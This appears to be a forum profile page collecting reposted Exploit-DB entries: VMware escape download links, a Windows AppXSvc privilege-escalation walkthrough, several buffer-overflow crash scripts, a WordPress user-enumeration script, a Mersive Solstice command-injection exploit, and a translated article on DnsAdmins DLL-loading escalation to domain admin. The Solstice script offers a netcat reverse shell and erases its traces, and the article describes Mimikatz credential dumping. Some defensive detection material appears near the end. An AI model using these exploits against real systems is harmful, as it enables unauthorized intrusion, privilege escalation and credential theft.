Everything posted by HireHackking

  1. # VMware Escape Exploit

     VMware Escape Exploit before VMware WorkStation 12.5.5

     Host Target: Win10 x64
     Compiler: VS2013
     Test on VMware 12.5.2 build-4638234

     # Known issues
     * Failing heap manipulation causes a host process crash.
     * Not quite elaborate because I'm not good at doing heap "fengshui" on Windows LFH.

     # FAQ
     * Q: Error rebooting vmware after the process crashes.
     * A: Just remove the `*.lck` folder in your vm directory or wait a while and have a coffee :). Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up.

     ![](https://github.com/unamer/vmware_escape/raw/master/cve-2017-4901/exp.gif)

     EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47714.zip
  2. # Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation
     # Date: 2019-11-22
     # Exploit Author: Abdelhamid Naceri
     # Vendor Homepage: www.microsoft.com
     # Tested on: Windows 10 1903
     # CVE : CVE-2019-1385

     Windows: "AppX Deployment Service" (AppXSVC) elevation of privilege vulnerability

     Class: Local Elevation of Privileges

     Description:
     This PoC exploits a vulnerability in AppXSvc; abusing this vulnerability could allow an attacker to overwrite/create a file as SYSTEM, which can result in EoP. There are 2 ways to abuse the issue.

     Steps To Reproduce:

     [1] For Arbitrary File Creation
     1. Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup into a junction to your target directory, for example "c:\"
     2. Open PowerShell and execute the command: Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
     3. Check the directory; the file should be created now
     4. Enjoy :)

     [2] To Overwrite a File
     1. Create a temp dir in %temp%\
     2. Create a hardlink to your target file in the temp dir you created
     3. Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup into a junction to the temp dir you created
     4. Open PowerShell and execute the command: Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
     5. Check the file again

     Limitation:
     When 'MicrosoftEdge.exe' is created it inherits the directory permissions, which means the file wouldn't be writable in the majority of cases. But a simple example of abuse is the directory "c:\": the default ACL prevents Authenticated Users from creating files but not from modifying them, so if we abuse the vulnerability in "c:\" we will have an arbitrary file created that is also writeable by a normal user.
     Also, you can't overwrite files that are not writable by SYSTEM. I didn't make a check in the PoC because if the file is not readable by the current user the check would return false even if the file is writable by SYSTEM.
     NOTE: you can also overwrite files which you can't even read.
     For file creation, make sure the path is writable by SYSTEM, otherwise the PoC will fail. I think 99% of folders are writable by SYSTEM.

     Platform:
     This has been tested on a fully patched system (latest patch -> November 2019):
     OS Edition: Microsoft Windows 10 Home
     OS Version: 1903
     OS Version Info: 18362.418
     Additional Info: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuildLabEx = 18362.1.amd64fre.19h1_release.190318-1202

     Expected result:
     The deployment process should fail with "ERROR_ACCESS_IS_DENIED"

     Observed result:
     The deployment process is overwriting or creating an arbitrary file as "LOCAL SYSTEM"

     NOTE: It was patched on 7/11/19
  3. 0x00 Introduction

     In addition to implementing its own DNS server functionality, Microsoft has also implemented its own management protocol for that server, to make management integrate with Active Directory domains. By default, domain controllers are also DNS servers, and in most cases every domain user needs to access and use the DNS server's functions. This exposes a considerable attack surface on domain controllers: on one side the DNS protocol itself, and on the other the RPC-based management protocol. Here we dig into the DNS server implementation and present in detail a nice privilege escalation technique. In some cases it lets you run dangerous code on a domain controller; this is not a security vulnerability but, as Microsoft confirmed, merely a feature trick that can give a red team AD privilege escalation. We collected information from the official Microsoft documentation ([MS-DNSP], https://msdn.microsoft.com/en-us/library/cc422504.aspx) and reversed the dns.exe binary with IDA.

     0x01 DNS Server Management Protocol basics

     [MS-DNSP] specifies the Domain Name Service (DNS) Server Management Protocol, which defines an RPC interface providing methods for remotely accessing and administering a DNS server. It is an RPC-based client and server protocol for configuring, managing and monitoring a DNS server. The management protocol layer sits on top of RPC and can be layered over TCP or named pipes. If you are interested in the protocol or how it is implemented, you can find it on a domain controller under c:\windows\system32\dns.exe. Its RPC interface UUID is 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 and it is transported over a named pipe called \pipe\dnsserver.

     The DNS server runs as a service on the domain controller. The management interface is opened by running dnsmgmt.msc and connecting to the AD DNS server (usually the domain controller); it lets a user configure DNS zones, lookups, caching, forwarding, logging and so on. The objects in this structure include the DNS server object (not the computer account), zone objects and records. Here we are interested in the DNS server object; its rules and policies on a fresh installation are shown in the figure below.

     By default, only the DnsAdmins, Domain Admins, Enterprise Admins, Administrators and Enterprise Domain Controllers groups have write permission on this object. From an attacker's point of view, let's see what we can do when we have DnsAdmins, or when we are not in the DnsAdmins group but are a member of any group with read/write permission on DNS.

     0x02 Abusing DnsAdmins permissions

     * DNS management is performed over RPC (UUID 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076), and the transport mechanism is the named pipe \pipe\dnsserver.
     * According to Microsoft's protocol specification, a DLL of choice can be loaded via "ServerLevelPluginDll" (with no validation of the DLL path).
     * dnscmd.exe implements this function: dnscmd.exe /config /serverlevelplugindll \\path\to\dll
     * Running this dnscmd.exe command as a user who is a member of DnsAdmins sets the following registry value: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll
     * Restarting the DNS service loads the DLL from that remote path. However, the DLL must contain the export functions DnsPluginInitialize, DnsPluginCleanup and DnsPluginQuery.
     * The DLL must be on a network share host that the domain controller's computer account can access.

     Note that Mimikatz includes a customizable DLL (source code on GitHub), so an attacker can modify the Mimikatz DLL so that, when the DNS service starts and loads it, credentials are dumped to a location the attacker can read.

     0x03 Fuzzing ServerLevelPluginDll

     The specification's message processing events and sequencing rules basically describe every operation the server must support. The first is R_DnssrvOperation, which takes a pszOperation parameter that decides which operation the server performs. Scrolling down, we browse the list of possible pszOperation values:

     We can see that the server loads a DLL of choice. Searching the document for ServerLevelPluginDll turns up the following useful information:

     The server doesn't even seem to validate the DLL path given in this operation. Before starting an implementation, we Google ServerLevelPluginDll; there is little information, but the useful dnscmd command line tool pops up. Fortunately, dnscmd does everything we need. A quick look at its help, which you can also find at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd, gives the command option:

     dnscmd.exe /config /serverlevelplugindll \\path\to\dll

     First, try running this as a regular domain user with no special permissions on the DNS server object (generic read is granted by default to all members of the Pre-Windows 2000 Compatible Access group, which includes the Domain Users group): the command fails with access denied. Giving the regular user write access to the server object makes the command succeed, which means members of the DnsAdmins group can run this command successfully. Running Process Monitor and Process Explorer on the DC while we run it from a domain member machine, we see, as expected, that no DLL is loaded into the address space of dns.exe. However, we see the following registry key being written with the path we sent:

     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll

     Now we restart the DNS Server service to test; it fails to start, and it starts again once the registry value is cleared. Obviously more is needed from the DLL.

     There are a few ways to reach the function we are after quickly: search for related strings in IDA, or search for related APIs, which is usually the easiest and fastest way. In our case LoadLibraryW or GetProcAddress gives us what we need: the code of the DLL loading function and the function that calls LoadLibraryW. We see that there is no validation at all of the ServerLevelPluginDll path. The problem we have is certainly unique: if the DLL fails to load, or does not contain DnsPluginInitialize, DnsPluginCleanup or DnsPluginQuery, the service will not start. We also have to make sure the exports all return 0 (success), otherwise that can cause the service to fail too. The pseudocode of the function responsible for loading the DLL is roughly as follows:

     ```c
     HMODULE hLib;

     if (g_pluginPath && *g_pluginPath) {
         hLib = LoadLibraryW(g_pluginPath);   /* the path is used as-is, without validation */
         g_hndPlugin = hLib;
         if (!hLib) {
             /* ... log and return error ... */
         }
         g_dllDnsPluginInitialize = GetProcAddress(hLib, "DnsPluginInitialize");
         if (!g_dllDnsPluginInitialize) {
             /* ... log and return error ... */
         }
         g_dllDnsPluginQuery = GetProcAddress(hLib, "DnsPluginQuery");
         if (!g_dllDnsPluginQuery) {
             /* ... log and return error ... */
         }
         g_dllDnsPluginCleanup = GetProcAddress(hLib, "DnsPluginCleanup");
         if (!g_dllDnsPluginCleanup) {
             /* ... log and return error ... */
         }
         if (g_dllDnsPluginInitialize) {
             g_dllDnsPluginInitialize(pCallback1, pCallback2);
         }
     }
     ```

     This PoC shows what the code of such a DLL looks like in Visual Studio 2015. An export definition is used at compile time to rename the default export names to the required ones. To make sure the exports are fine, you can use /exports path\to\dll.

     Now we try running dnscmd with the new DLL and voila, it works. All the DLL needs is to be placed on a network path that the domain controller's computer account can access (dns.exe runs as SYSTEM, so that account's SID must have access).

     This means that if you are a member of DnsAdmins you can take over more than just the rights to manage DNS, and it is not limited to that group: all you need to complete this escalation is an account with write access to the DNS server object. In my experience, the ACLs on these objects are usually not monitored like those of Domain Admins (or similar admin-protected groups), which gives an inconspicuous average domain user an excellent opportunity to elevate privileges.

     As the official documentation states, this should apply to all modern Windows Server versions. Microsoft's MSRC is already tracking this issue and said it is basically fixed by letting DC administrators change the permissions on the ServerLevelPluginDll registry key; the feature may be turned off in a future release.

     In any case, dns.exe currently runs as SYSTEM and is exposed to dangerous attacks, so it could be a useful target for some fuzzers.

     0x04 Example: privilege escalation from DNS to AD domain admin

     A user who is a member of the DnsAdmins group, or who has write permission on the DNS server object, can load a DLL with SYSTEM permission on the DNS server. Since many enterprise setups also use domain controllers (DCs) as DNS servers, let's see how this works in practice.

     Here we set up an experiment to verify it. In this experiment, we first get access to the AD domain through a regular domain user (labuser) (DNS and AD are on the same server). First, enumerate the users who belong to the DnsAdmins group with PowerView:

     PS C:\> Get-NetGroupMember -GroupName 'DnsAdmins'

     In a real red team engagement or pentest, the goal would be to go after the buildadmin user. With PowerView's Invoke-UserHunter we can find a host where buildadmin has an authentication ticket that lets us access the DNS server:

     PS C:\> Invoke-UserHunter -UserName buildadmin (run the command to find a host where the buildadmin user has an authentication ticket for accessing DNS)

     Assume we found such an authentication ticket for buildadmin and that the current user (labuser) also has local admin access there. We therefore have the permissions of a user who is a member of the DnsAdmins group.

     There are now two situations: one where the server is both DC and DNS server, and one where a separate server acts as the DNS server.

     In the first case, the DNS Server service runs on the DC. We can use the dnscmd tool to load the DLL. There is also the DNSServer PowerShell module, but there is no detailed record of using it. The DLL can be loaded remotely with the following command; the UNC path \\ops-build\dll must be readable by the DC:

     PS C:\> dnscmd ops_dc /config /serverlevelplugindll \\ops-build\dll\mimilib.dll (as a regular domain account that has write permission on DNS, to access DNS and escalate DNS rights)

     For debugging (admin permission on the target is required), you can check whether the DLL was added successfully on the target with the following command:

     PS C:\> Get-ItemProperty

     Now, since the user buildadmin we obtained belongs to the DnsAdmins group, we can restart the DNS service. This is not the default configuration, but such users have the right to restart the DNS service.

     C:\> sc \\ops-dc stop dns
     C:\> sc \\ops-dc start dns

     So what do we get after running the above commands successfully? Benjamin promptly updated mimilib for this attack. The updated version of mimilib used in this attack logs all DNS queries to C:\Windows\System32\kiwidns.log.

     kdns.c can be modified to include remote command execution capability. I included simple code that obfuscates a PowerShell shell with Nishang's Invoke-Encode encoding. The payload runs for every query the DNS service handles.

     A shell bouncing from the remote server (DC) to the listening server:

     We can confirm that SYSTEM permission was obtained on the domain controller.

     In the second case, even when the DNS service is not running on a DC, we can still use the user's "only" DnsAdmins permissions and restart the DNS service to obtain SYSTEM access.

     How to detect the attack? To prevent it, review the policy for write permission on the DNS server object and the membership of the DnsAdmins group. DNS service restarts show up in the logs: in the DNS Server log, event ID 150 means failure and 770 means success. In the Microsoft-Windows-DNS-Server/Audit log, event ID 541 is logged for both success and failure. Monitoring the registry value \SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll is also useful.

     0x05 Defense

     * Make sure only administrator accounts are members of the DnsAdmins group and only administrators have permission to manage system DNS.
     * Regularly check that the DNS server object permission policy settings for groups/accounts without privileged access are correct.
     * Restrict RPC communication with DCs to administrative access subnets.
     * Allow DC administrators to change the permissions on the ServerLevelPluginDll registry key.
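     As an added defender-side example (not part of the original article or of any of the tools it mentions), the following PowerShell script audits the three indicators the post names: DnsAdmins membership, the ServerLevelPluginDll registry value, and the DNS Server restart events 150/770 plus audit event 541. It assumes it runs locally on the DNS server with the ActiveDirectory module installed; the `$Hours` window and the variable names are my own choices.

     ```powershell
     # Added example: audit the DnsAdmins / ServerLevelPluginDll indicators described above.
     # Assumption: run locally on the DNS server (the registry read is local) with RSAT's
     # ActiveDirectory module available. Nothing here changes configuration.
     param(
         [int]$Hours = 24   # how far back to look in the event logs (assumed default)
     )

     # 1. Membership of DnsAdmins (recursive, so nested groups are expanded).
     #    The post's defense list says only administrator accounts should be here.
     $members = Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
         Select-Object -ExpandProperty SamAccountName
     Write-Output ("DnsAdmins members: " + ($members -join ', '))

     # 2. The value written by "dnscmd /config /serverlevelplugindll <path>".
     #    Absent or empty is the expected state; a UNC path is the classic sign of this technique.
     $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
     $plugin = (Get-ItemProperty -Path $key -Name 'ServerLevelPluginDll' -ErrorAction SilentlyContinue).ServerLevelPluginDll
     if ([string]::IsNullOrEmpty($plugin)) {
         Write-Output 'ServerLevelPluginDll: not set (expected)'
     } else {
         Write-Warning "ServerLevelPluginDll is set to '$plugin'"
         if ($plugin -like '\\*') { Write-Warning 'Plugin DLL points at a network share' }
     }

     # 3. Service restarts and the configuration-change audit event named in the post:
     #    DNS Server log 150 = service failed to start, 770 = service started; Audit log 541.
     $since = (Get-Date).AddHours(-$Hours)
     $restarts = Get-WinEvent -FilterHashtable @{ LogName = 'DNS Server'; Id = 150, 770; StartTime = $since } -ErrorAction SilentlyContinue
     $audit    = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-DNS-Server/Audit'; Id = 541; StartTime = $since } -ErrorAction SilentlyContinue

     Write-Output "DNS Server start/fail events (150/770) in the last $Hours h: $(@($restarts).Count)"
     $restarts | Select-Object TimeCreated, Id, Message | Format-Table -AutoSize -Wrap
     Write-Output "DNS audit events (541) in the last $Hours h: $(@($audit).Count)"
     $audit | Select-Object TimeCreated, Id, Message | Format-Table -AutoSize -Wrap
     ```

     A non-empty ServerLevelPluginDll value combined with a 770 start event and a 541 audit event in the same window is the sequence the post describes, and is what an alert should key on.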
  4. # VMware Escape Exploit

     VMware Escape Exploit before VMware WorkStation 12.5.3

     Host Target: Win10 x64
     Compiler: VS2013
     Test on VMware 12.5.2 build-4638234

     # Known issues
     * Failing heap manipulation causes a host process crash. (About 50% success rate)
     * Not quite elaborate because I'm not good at doing heap "fengshui" on Windows LFH.

     # FAQ
     * Q: Error rebooting vmware after the process crashes.
     * A: Just remove the `*.lck` folder in your vm directory or wait a while and have a coffee :). Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up.

     ![](https://github.com/unamer/vmware_escape/raw/master/CVE-2017-4905_and_uaf/exploit.gif)

     # Reference
     * https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/

     EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47715.zip
  5. #Exploit Title: Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)
     #Exploit Author : ZwX
     #Exploit Date: 2019-11-26
     #Vendor Homepage : https://www.microsoft.com/
     #Link Software : https://www.microsoft.com/en-us/download/details.aspx?id=681
     #Tested on OS: Windows 7

     Proof of Concept (PoC):
     =======================
     1. Download and install Microsoft DirectX SDK
     2. Open the PIX for Windows tools
     3. Run the python script that will create a file (poc.PIXrun)
     4. Run the software "File -> Open File -> Add the file (.PIXrun)"
     5. PIX for Windows crashes

     ```python
     #!/usr/bin/python
     # Python 2 script: writes the crafted .PIXrun file into the current directory
     DoS = ("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
            "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
            "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
            "\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
            "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
            "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")

     poc = DoS
     # open in binary mode so the raw bytes are written unchanged
     file = open("poc.PIXrun", "wb")
     file.write(poc)
     file.close()
     print("POC Created by ZwX")
     ```
  6. # Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" 'No Redibujar'/'Deshabilitados' Denial of Service (PoC)
     # Discovery by: chuyreds
     # Google Dork: chuyrojas1997@gmail.com: chuyreds
     # Discovery Date: 2019-11-23
     # Vendor Homepage: http://www.indusoft.com/
     # Software Link : http://www.indusoft.com/Products-Downloads
     # Tested Version: 8.1 SP1
     # Vulnerability Type: Denial of Service (DoS) Local
     # Tested on OS: Windows 10 Pro x64 es

     # Steps to Produce the Denial of Service:
     # 1.- Run python code: InduSoft Web Studio Edition 8.1 SP1.py
     # 2.- Open "InduSoft Web Studio Edition 8.1 SP1.txt" and copy content to clipboard
     # 3.- Open InduSoft Web Studio Edition 8.1 SP1
     # 4.- On Graficos select Atributos
     # 5.- Paste Clipboard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"

     ```python
     #!/usr/bin/env python
     # writes 1026 'A' characters to the file that is pasted into the dialog
     buffer = "\x41" * 1026
     f = open("InduSoft Web Studio Edition 8.1 SP1.txt", "w")
     f.write(buffer)
     f.close()
     ```
  7. # Exploit Title: iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)
     # Discovery by: Ivan Marmolejo
     # Discovery Date: 2019-11-25
     # Vendor Homepage: https://apps.apple.com/mx/app/inettools-ping-dns-port-scan/id561659975
     # Software Link: App Store for iOS devices
     # Tested Version: 8.20
     # Vulnerability Type: Denial of Service (DoS) Local
     # Tested on OS: iPhone 6s iOS 13.2

     # Summary: iNetTools is a suite of network diagnostic tools for iPhone and iPad. It provides essential tools such as
     # Ping, DNS Lookup, Trace Route, Port Scan, Whois, Server Monitor, and Lan Scan.

     # Steps to Produce the Crash:
     # 1.- Run python code: iNetTools.py
     # 2.- Copy content to clipboard
     # 3.- Open "iNetTools for iOS"
     # 4.- Go to "Whois"
     # 5.- Paste Clipboard on "Domain Name"
     # 6.- Start
     # 7.- Crashed

     ```python
     #!/usr/bin/env python
     # prints 98 'A' characters to paste into the "Domain Name" field
     buffer = "\x41" * 98
     print(buffer)
     ```
  8. #Exploit Title: SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)
     #Exploit Author : ZwX
     #Exploit Date: 2019-11-26
     #Vendor Homepage : http://www.nsauditor.com/
     #Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
     #Tested on OS: Windows 7

     '''
     Proof of Concept (PoC):
     =======================
     1. Download and install SpotAuditor
     2. Run the python script that will create a file (poc.txt)
     3. Run the software "Tools -> Base64 Encrypted Password"
     4. Copy the characters in the file (poc.txt)
     5. Paste the characters in the field 'Base64 Encrypted Password' and click on 'Decrypt'
     6. SpotAuditor crashes
     '''

     ```python
     #!/usr/bin/python
     # writes "http//" followed by 2000 'A' characters to poc.txt
     http = "http//"
     buffer = "\x41" * 2000
     poc = http + buffer
     file = open("poc.txt", "w")
     file.write(poc)
     file.close()
     print("POC Created by ZwX")
     ```
  9. # Exploit Title : Wordpress 5.3 - User Disclosure
     # Author: SajjadBnd
     # Date: 2019-11-17
     # Software Link: https://wordpress.org/download/
     # version : wp < 5.3
     # tested on : Ubuntu 18.04 / python 2.7
     # CVE: N/A

     ```python
     #!/usr/bin/python
     # -*- coding: utf-8 -*-
     # Python 2 script: lists users exposed by the /wp-json/wp/v2/users/ REST endpoint
     import requests
     import os
     import re
     import json
     import sys
     import urllib3


     def clear():
         linux = 'clear'
         windows = 'cls'
         os.system([linux, windows][os.name == 'nt'])


     def Banner():
         print('''
         - Wordpress < 5.3 - User Enumeration
         - SajjadBnd
         ''')


     def Desc():
         url = raw_input('[!] Url >> ')
         vuln = url + "/wp-json/wp/v2/users/"
         while True:
             try:
                 r = requests.get(vuln, verify=False)
                 content = json.loads(r.text)
                 data(content)
             except requests.exceptions.MissingSchema:
                 # no scheme was given: prepend http:// and retry
                 vuln = "http://" + vuln


     def data(content):
         for x in content:
             name = x["name"].encode('UTF-8')
             print("======================")
             print("[+] ID : " + str(x["id"]))
             print("[+] Name : " + name)
             print("[+] User : " + x["slug"])
         sys.exit(1)


     if __name__ == '__main__':
         urllib3.disable_warnings()
         reload(sys)
         sys.setdefaultencoding('UTF8')
         clear()
         Banner()
         Desc()
     ```
  10. # Exploit Title: GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)
      # Discovery by: Ivan Marmolejo
      # Discovery Date: 2019-11-27
      # Vendor Homepage: https://apps.apple.com/mx/app/ghia-camip/id1342090963
      # Software Link: App Store for iOS devices
      # Tested Version: 1.2
      # Vulnerability Type: Denial of Service (DoS) Local
      # Tested on OS: iPhone 6s iOS 13.2.3

      # Summary: With GHIA CamIP you can view your cameras in real time. It supports conventional IPC cameras,
      # cameras with alarm, video intercom and other devices.

      # Steps to Produce the Crash:
      # 1.- Run python code: GHIA.py
      # 2.- Copy content to clipboard
      # 3.- Open "GHIA CamIP for iOS"
      # 4.- Go to "Add"
      # 5.- Wireless Settings
      # 6.- Connect to the internet
      # 7.- Paste Clipboard on "Password"
      # 8.- WiFi Connection
      # 9.- Start setting
      # 10.- Crashed

      ```python
      #!/usr/bin/env python
      # prints 33 'A' characters to paste into the "Password" field
      buffer = "\x41" * 33
      print(buffer)
      ```
  11. #Exploit Title: SpotAuditor 5.3.2 - 'Key' Denial of Service
      #Exploit Author : ZwX
      #Exploit Date: 2019-11-28
      #Vendor Homepage : http://www.nsauditor.com/
      #Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
      #Tested on OS: Windows 7
      #Social: twitter.com/ZwX2a

      '''
      Proof of Concept (PoC):
      =======================
      1. Download and install SpotAuditor
      2. Run the python script that will create a file (poc.txt)
      3. Run the software "Register -> Enter Registration Code"
      4. Copy the characters in the file (poc.txt)
      5. Paste the characters in the field 'Key' and click on 'Ok'
      6. SpotAuditor crashes
      '''

      ```python
      #!/usr/bin/python
      # writes "http//" followed by 2000 'A' characters to poc.txt
      http = "http//"
      buffer = "\x41" * 2000
      poc = http + buffer
      file = open("poc.txt", "w")
      file.write(poc)
      file.close()
      print("POC Created by ZwX")
      ```
  12. # Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution
      # Google Dork: N/A
      # Date: 2016-12-23
      # Exploit Author: Alexandre Teyar
      # Vendor Homepage: https://www2.mersive.com/
      # Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk
      # Versions: 2.8.0
      # Tested On: Mersive Solstice 2.8.0
      # CVE: CVE-2017-12945

      # Description : This will exploit an (authenticated) blind OS command injection
      #               vulnerability present in Solstice devices running versions
      #               of the firmware prior to 2.8.4.
      # Notes       : To get the command output (in piped-mode), a netcat listener
      #               (e.g. 'nc -lkvp <LPORT>') needs to be launched before
      #               running the exploit.
      #               To get an interactive root shell use the following syntax
      #               'python.exe .\CVE-2017-12945.py -pass <PASSWORD>
      #               -rh <RHOST> -p "busybox nc <LHOST> <LPORT>
      #               -e /system/bin/sh -i"'.

      ```python
      #!/usr/bin/env python3
      import argparse
      import logging
      import requests
      import sys
      import time


      def parse_args():
          """ Parse and validate the command line supplied by users """
          parser = argparse.ArgumentParser(
              description="Solstice Pod Blind Command Injection"
          )
          parser.add_argument(
              "-d", "--debug",
              dest="loglevel",
              help="enable verbose debug mode",
              required=False,
              action="store_const",
              const=logging.DEBUG,
              default=logging.INFO
          )
          parser.add_argument(
              "-lh", "--lhost",
              dest="lhost",
              help="the listening address",
              required=False,
              type=str
          )
          parser.add_argument(
              "-lp", "--lport",
              dest="lport",
              help="the listening port - default 4444",
              required=False,
              default="4444",
              type=str
          )
          parser.add_argument(
              "-p", "--payload",
              dest="payload",
              help="the command to execute",
              required=True,
              type=str
          )
          parser.add_argument(
              "-pass", "--password",
              dest="password",
              help="the target administrator password",
              required=False,
              default="",
              type=str
          )
          parser.add_argument(
              "-rh", "--rhost",
              dest="rhost",
              help="the target address",
              required=True,
              type=str
          )
          return parser.parse_args()


      def main():
          try:
              args = parse_args()
              lhost = args.lhost
              lport = args.lport
              password = args.password
              rhost = args.rhost

              logging.basicConfig(
                  datefmt="%H:%M:%S",
                  format="%(asctime)s: %(levelname)-8s %(message)s",
                  handlers=[logging.StreamHandler()],
                  level=args.loglevel
              )

              # Redirect stdout and stderr to <FILE>
              # only when the exploit is launched in piped mode
              if lhost and lport:
                  payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1"
                  logging.info(
                      "attacker listening address: {}:{}".format(lhost, lport)
                  )
              else:
                  payload = args.payload

              logging.info("solstice pod address: {}".format(rhost))
              if password:
                  logging.info(
                      "solstice pod administrator password: {}".format(password)
                  )

              # Send the payload to be executed
              logging.info("sending the payload...")
              send_payload(rhost, password, payload)

              # Send the results of the payload execution to the attacker
              # using 'nc <LHOST> <LPORT> < <FILE>' then remove <FILE>
              if lhost and lport:
                  payload = (
                      "busybox nc {} {} < /data/local/tmp/rce.tmp ".format(
                          lhost, lport
                      )
                  )
                  logging.info("retrieving the results...")
                  send_payload(rhost, password, payload)

                  # Erase exploitation traces
                  payload = "rm -f /data/local/tmp/rce.tmp"
                  logging.info("erasing exploitation traces...")
                  send_payload(rhost, password, payload)
          except KeyboardInterrupt:
              logging.warning("'CTRL+C' pressed, exiting...")
              sys.exit(0)


      def send_payload(rhost, password, payload):
          URL = "http://{}/Config/service/saveData".format(rhost)
          headers = {
              "Content-Type": "application/json",
              "X-Requested-With": "XMLHttpRequest",
              "Referer": "http://{}/Config/config.html".format(rhost)
          }
          data = {
              "m_networkCuration": {
                  "ethernet": {
                      "dhcp": False,
                      "staticIP": "; {}".format(payload),
                      "gateway": "",
                      "prefixLength": 24,
                      "dns1": "",
                      "dns2": ""
                  }
              },
              "password": "{}".format(password)
          }

          # Debugging using the BurpSuite
          # proxies = {
          #     'http': 'http://127.0.0.1:8080',
          #     'https': 'https://127.0.0.1:8080'
          # }

          try:
              logging.info("{}".format(payload))
              response = requests.post(
                  URL,
                  headers=headers,
                  # proxies=proxies,
                  json=data
              )
              logging.debug("{}".format(response.json()))
              # Wait for the command to be executed
              time.sleep(2)
          except requests.exceptions.RequestException as ex:
              logging.error("{}".format(ex))
              sys.exit(0)


      if __name__ == "__main__":
          main()
      ```
  13. In this article, we introduce cracking WiFi passwords with hashcat!
  14. # Exploit Title: TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path
      # Date: 2019-11-28
      # Exploit Author: Cristian Ayala G
      # Vendor Homepage: https://tenaxsoft.com/index.html
      # Software Link: https://tenaxsoft.com/descargas.html
      # Version: 6.4.131
      # Tested on: Windows 10 Pro x64

      ##########################################################################
      # Step to discover the unquoted Service:

      C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr -i "auto" | findstr -i -v "C:\Windows\\" | findstr -i -v """

      CCSrvProxy                      CCSrvProxy             C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe         Auto
      Control de impresiones Tenax    ControldeImpresiones   C:\Program Files (x86)\TenaxSoft\CyberPlanet\TenaxService64.exe   Auto

      ##########################################################################
      # Service info:

      C:\Users\user>sc qc CCSrvProxy
      [SC] QueryServiceConfig CORRECTO

      NOMBRE_SERVICIO: CCSrvProxy
              TIPO               : 10  WIN32_OWN_PROCESS
              TIPO_INICIO        : 2   AUTO_START
              CONTROL_ERROR      : 1   NORMAL
